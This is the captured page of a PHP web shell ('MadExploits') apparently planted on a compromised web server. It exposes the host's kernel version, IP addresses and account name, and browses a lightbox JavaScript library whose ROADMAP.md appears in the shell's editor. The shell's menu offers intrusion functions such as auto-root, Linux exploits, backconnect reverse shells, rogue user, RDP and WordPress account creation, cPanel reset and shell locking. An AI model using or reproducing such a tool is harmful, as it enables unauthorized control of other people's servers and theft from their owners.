Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.145.89.181
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
micro /
assets /
lb /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.editorconfig
415
B
-rw-r--r--
.jscsrc
1.38
KB
-rw-r--r--
.jshintrc
547
B
-rw-r--r--
DEPLOY.md
1.04
KB
-rw-r--r--
Gruntfile.js
1.84
KB
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
README.md
1.62
KB
-rw-r--r--
ROADMAP.md
2.88
KB
-rw-r--r--
bower.json
545
B
-rw-r--r--
package-lock.json
132.04
KB
-rw-r--r--
package.json
1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ROADMAP.md
# Roadmap ## v2.x - Maintenance Mode No new features are being worked on for v2.x. ## v3.0 - Brainstorming, no timeline ### Focus - Nailing the mobile experience - Fluid iteractions across devices - Maintaining ease of setup ### Not planned for v3.0 The goal of this script from it's beginnings till today is to to provide a better *image viewing experience*. - **HTML or video content:** If you need to show html or video content, I recommend googling for an alternative script as there are many options. - **Social sharing buttons** ### Image support - **`srcset` and `<picture>`**: Investigate - **EXIF rotation data**: Investigate - **File formats**: All formats supported by the browser utilized? Test vector formats, e.g. SVG. Test animated, e.g. GIF. ### Interactions - **Swipe gesture**: Allow swiping horizontally to navigate between images in a set. Up and down to exist. - **Wide images on mobile**: Explore cropping when height would be reduced substantially on mobile devices. Allow swiping, and maybe tilt, support to view full image. Hint at behavior by doing small horizontal slide in when opening? What does tapping do? How does horizontal swiping affect navigation in sets? - If user attempts to go forward when at end of image set, animation (shake?) indicating the end or option to close Lightbox. - Make sure right-click/long pressing works to access the image's context menu. ### Layout - Allow vertical centering. - Update sizing on window resize. - Should the dev be able to choose the position of the caption, close button, and nav controls? - Optimize layout for mobile. - Optimize layout for screens of varying densities. - Should the close button still live in the bottom right corner? ### Animations - **Start/end animation**: Animate towards the trigger. - **Easing:** Speed up and include bounce? Options to control? - **Performant animations**: Rewrite to use transforms exclusively. ### Assets - Use inline SVG for UI elements. ### Caching - **Preloading**: Review if and which images should be preloaded. Options? ### Error Handling - What happens when an image url is incorrect? - What happens when an image takes too long to load? ### Native behavior and accessibility - **Right-click support**: Bring up image context menu. Allow saving and copying image. - Should opening lightbox update the url? and should this url be parsed on page load to show Lightbox automatically? - Review alt attributes. - Review ARIA roles. - Review constrast ratios. - Review keyboard input and tabbing. - Review click/touch target size. - Test with screen reader. ### API - Do not initialize automatically and allow multiple instances. - Add event handlers. - Allow setting options on the fly. - Allow the setting of options from HTML? - Evaluate preloading and caching. - Allow placement inside of a specified element? Orig feature requester was dealing with iframe. ### Dependencies - Drop jQuery requirement.
Close